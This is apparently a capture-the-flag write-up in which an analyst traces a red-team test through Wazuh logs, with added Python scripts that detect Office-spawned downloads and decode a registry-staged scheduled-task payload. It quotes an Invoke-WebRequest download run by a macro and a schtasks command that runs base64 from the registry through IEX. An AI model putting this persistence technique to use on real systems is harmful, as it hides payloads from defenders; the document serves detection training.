This room simulates a situation where I am a security analyst triaging a security test from logs centralised in Wazuh. The goal is to find out what the red team did to compromise SwiftSpend. The logs were collected from 2 endpoints. The test ran on April 29, 2024 between 12:00 and 20:00.
| Hostname | IP address | OS |
|---|---|---|
| Windows_SwiftSpend | 10.10.157.254 | Windows Server 2019 Datacenter |
| Windows_SwiftSpend2 | 10.10.205.57 | Windows Server 2019 Datacenter |

Security Event filtered by the saved Monday_Monitor query.
Initial access was established using a downloaded file. What is the file name saved on the host?
The first question hints that initial access came from a downloaded file. The file could have been fetched with a browser or with the Invoke-WebRequest cmdlet, so I search for both.
! Go to Events and filter on the strings http and Invoke-WebRequest

Querying for records that contain the string http yields 3 results.
The earliest, at 13:45:31.277, shows a command line executed by powershell.exe spawned from an Office product. Wazuh displays the commandLine field with JSON escaping (a backslash before every quote, and every backslash doubled); with that undone, the command is:

```
"powershell.exe" & {$url = 'http://localhost/SwiftSpend_Financial_Expenses.xlsm' Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm}
```

Note the two names in this one line: the file requested from the web server is SwiftSpend_Financial_Expenses.xlsm, while -OutFile writes it to the user's TEMP directory as PhishingAttachment.xlsm.
! This command came from a VBA macro in PhishingAttachment.xlsm.
<aside> 💡
Q1: The file it tried to download was SwiftSpend_Financial_Expenses.xlsm.
</aside>
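The same query can be run outside the Wazuh UI once alerts are exported as JSON. The script below is an added example (my own code, not part of the room or of Wazuh): it scans Sysmon process-creation alerts (event ID 1) for a shell spawned by an Office application whose command line contains a download primitive, then pulls out the URL, the remote file name and the -OutFile path separately so the two names cannot be confused. The three alert records are constructed to mirror Wazuh's field layout for Windows eventchannel data (data.win.system.eventID, data.win.eventdata.commandLine, data.win.eventdata.parentImage); only the first reproduces the event from this write-up, the other two are made-up benign look-alikes, and the host intranet.local and the list of Office parent processes are my assumptions.

```python
"""Flag Office-spawned download commands in Wazuh-forwarded Sysmon alerts.

Added example. SAMPLE_ALERTS is constructed to mimic Wazuh's Windows
eventchannel layout (data.win.system / data.win.eventdata); it is not an
export from the room's Wazuh manager.
"""
import json
import re
from pathlib import PureWindowsPath

# Constructed alerts, one JSON document per line (the alerts.json format).
# Only the first is the event from the write-up (EXCEL.EXE -> powershell.exe
# -> Invoke-WebRequest); the other two are benign look-alikes that must not fire.
SAMPLE_ALERTS = r'''
{"timestamp":"2024-04-29T13:45:31.277+0000","agent":{"name":"Windows_SwiftSpend"},"data":{"win":{"system":{"eventID":"1"},"eventdata":{"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE","commandLine":"\"powershell.exe\" & {$url = 'http://localhost/SwiftSpend_Financial_Expenses.xlsm' Invoke-WebRequest -Uri $url -OutFile $env:TEMP\\PhishingAttachment.xlsm}"}}}}
{"timestamp":"2024-04-29T13:46:02.100+0000","agent":{"name":"Windows_SwiftSpend"},"data":{"win":{"system":{"eventID":"1"},"eventdata":{"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parentImage":"C:\\Windows\\explorer.exe","commandLine":"powershell.exe -Command Invoke-WebRequest -Uri http://intranet.local/agent.msi -OutFile C:\\Temp\\agent.msi"}}}}
{"timestamp":"2024-04-29T13:47:15.000+0000","agent":{"name":"Windows_SwiftSpend2"},"data":{"win":{"system":{"eventID":"1"},"eventdata":{"image":"C:\\Windows\\System32\\cmd.exe","parentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","commandLine":"cmd.exe /c whoami"}}}}
'''

# Assumed set of Office parents worth alerting on when they spawn a shell.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Download primitives (cmdlets, their aliases and common LOLBins). Deliberately
# broad; the Office-parent condition is what keeps the noise down.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|downloadfile|downloadstring|"
    r"start-bitstransfer|certutil.*-urlcache|bitsadmin.*/transfer",
    re.I,
)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
OUTFILE_RE = re.compile(r"-OutFile\s+([^\s}]+)", re.I)


def parse_alerts(text):
    """Parse newline-delimited JSON alerts into dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_office_downloads(alerts):
    """Return one finding per Sysmon event 1 where an Office app spawned a downloader."""
    findings = []
    for alert in alerts:
        win = alert.get("data", {}).get("win", {})
        if win.get("system", {}).get("eventID") != "1":
            continue
        ev = win.get("eventdata", {})
        parent = PureWindowsPath(ev.get("parentImage", "")).name.lower()
        cmd = ev.get("commandLine", "")
        if parent not in OFFICE_PARENTS or not DOWNLOAD_RE.search(cmd):
            continue
        url = URL_RE.search(cmd)
        out = OUTFILE_RE.search(cmd)
        findings.append({
            "timestamp": alert.get("timestamp"),
            "agent": alert.get("agent", {}).get("name"),
            "parent": parent,
            "child": PureWindowsPath(ev.get("image", "")).name.lower(),
            "url": url.group(0) if url else None,
            # Name on the web server versus name written to disk: kept apart on purpose.
            "remote_name": url.group(0).rsplit("/", 1)[-1] if url else None,
            "local_path": out.group(1) if out else None,
            "command_line": cmd,
        })
    return findings


if __name__ == "__main__":
    for f in find_office_downloads(parse_alerts(SAMPLE_ALERTS)):
        print(f"{f['timestamp']} {f['agent']}: {f['parent']} -> {f['child']}")
        print(f"  fetched  {f['url']}")
        print(f"  saved as {f['local_path']}")
```

Feed it the real alerts.json from the manager (one JSON object per line) instead of SAMPLE_ALERTS and the same function walks the whole day. The parent-process check is the important half of the rule: Invoke-WebRequest from explorer.exe or a scheduled script is routine, the same cmdlet under EXCEL.EXE almost never is.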
What is the full command run to create a scheduled task?
Now that I know the test started around 13:45, I can narrow down the search.
To look for signs of a scheduled task, I query for Sysmon event ID 13 (RegistryEvent, value set) and 14 (RegistryEvent, key and value rename), the string Schedule (registered tasks are written under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache), and schtasks.exe. The search focuses on the period after 13:55, when the second-stage file SwiftSpend_Financial_Expenses.xlsm was downloaded.
MITRE document about Scheduled Task technique: https://attack.mitre.org/techniques/T1053/005/

The detection rules flag 2 events as having been started by a macro.
<aside> 💡
Q2: The answer is in the event at 14:00:30.986. With Wazuh's JSON escaping removed, the full command is:

```
"cmd.exe" /c "reg add HKCU\SOFTWARE\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F /TN "ATOMIC-T1053.005" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\SOFTWARE\\ATOMIC-T1053.005).test)))" /sc daily /st 12:34"
```
</aside>
The command does two things in one cmd.exe invocation: reg add stores a base64-encoded payload in the value test under HKCU\SOFTWARE\ATOMIC-T1053.005, and schtasks.exe /Create registers a daily task named ATOMIC-T1053.005 that runs at 12:34, reads that value back with Get-ItemProperty, decodes it with FromBase64String and executes the result through IEX. Nothing malicious is visible in the task action itself; the payload only appears once the registry value is decoded:
cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= : ping www.youarevulnerable.thm
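Decoding the task by hand works for one event; the script below, an added example that is my own code and not part of the write-up, Wazuh or Atomic Red Team, does the same mechanically. It takes the command line exactly as Wazuh displays it (JSON-escaped, so the backslash-quote and doubled-backslash sequences have to be undone first), splits out the reg add and schtasks /Create halves, decodes the base64 value that the task action will later read through Get-ItemProperty, and records which indicators tie the two halves together. The only input is the command line from the 14:00:30.986 event above; the function names and the indicator wording are my own.

```python
"""Dissect a schtasks persistence command whose payload is staged in the registry.

Added example. ESCAPED_COMMANDLINE reproduces the command line from the
14:00:30.986 event as Wazuh prints it (JSON-escaped); the parsing code is my
own, not Wazuh or Atomic Red Team functionality.
"""
import base64
import json
import re

# The command line as shown in the Wazuh event, still backslash-escaped for JSON.
ESCAPED_COMMANDLINE = r'''\"cmd.exe\" /c \"reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyB3d3cueW91YXJldnVsbmVyYWJsZS50aG0= /f & schtasks.exe /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005).test)))\" /sc daily /st 12:34\"'''

REG_ADD_RE = re.compile(r"\breg(?:\.exe)?\s+add\s+(\S+)\s+/v\s+(\S+)\s+/t\s+(\S+)\s+/d\s+(\S+)", re.I)
# schtasks quoting: /TN and /TR values are double-quoted, inner quotes are backslash-escaped.
TASK_NAME_RE = re.compile(r'/TN\s+"((?:\\"|[^"])*)"', re.I)
TASK_RUN_RE = re.compile(r'/TR\s+"((?:\\"|[^"])*)"', re.I)
SCHEDULE_RE = re.compile(r'/SC\s+([^\s"]+)', re.I)
START_RE = re.compile(r'/ST\s+([^\s"]+)', re.I)
B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")


def unescape_commandline(escaped):
    """Undo the JSON escaping Wazuh applies to data.win.eventdata.commandLine."""
    return json.loads('"' + escaped + '"')


def decode_b64(data):
    """Return the decoded text if data is well-formed base64 text, else None."""
    if not B64_RE.match(data):
        return None
    try:
        return base64.b64decode(data, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def _norm_key(path):
    """Normalise HKCU\\X, HKCU:\\X and HKCU:\\\\X to one comparable form."""
    return re.sub(r"\\+", lambda _: "\\", path.replace(":", "")).lower()


def triage_scheduled_task(cmdline):
    """Pull the staged payload and the task definition out of one command line."""
    finding = {"registry_payload": None, "task": None, "indicators": []}
    reg = REG_ADD_RE.search(cmdline)
    if reg:
        key, name, vtype, data = reg.groups()
        finding["registry_payload"] = {
            "key": key, "value": name, "type": vtype,
            "data": data, "decoded": decode_b64(data),
        }
    run = TASK_RUN_RE.search(cmdline)
    if run:
        action = run.group(1).replace('\\"', '"')  # schtasks-level quote escaping
        tn, sc, st = (p.search(cmdline) for p in (TASK_NAME_RE, SCHEDULE_RE, START_RE))
        finding["task"] = {
            "name": tn.group(1) if tn else None,
            "action": action,
            "schedule": sc.group(1) if sc else None,
            "start": st.group(1) if st else None,
        }
        if re.search(r"\bIEX\b|Invoke-Expression", action, re.I):
            finding["indicators"].append("task action runs text through Invoke-Expression")
        if "FromBase64String" in action:
            finding["indicators"].append("task action base64-decodes its payload at run time")
        if reg and _norm_key(key) in _norm_key(action):
            finding["indicators"].append("task action reads the registry value written by the same command")
    return finding


if __name__ == "__main__":
    result = triage_scheduled_task(unescape_commandline(ESCAPED_COMMANDLINE))
    print(json.dumps(result, indent=2))
```

The third indicator is the one that matters for triage: a task whose action only contains a registry read and a decoder looks harmless on its own, so the reg add in the same command line (or an earlier Sysmon event 13 on the same key) is what turns it into a finding. Re-running the decoder against the key after the fact also catches the case where the red team rewrites the value later without touching the task.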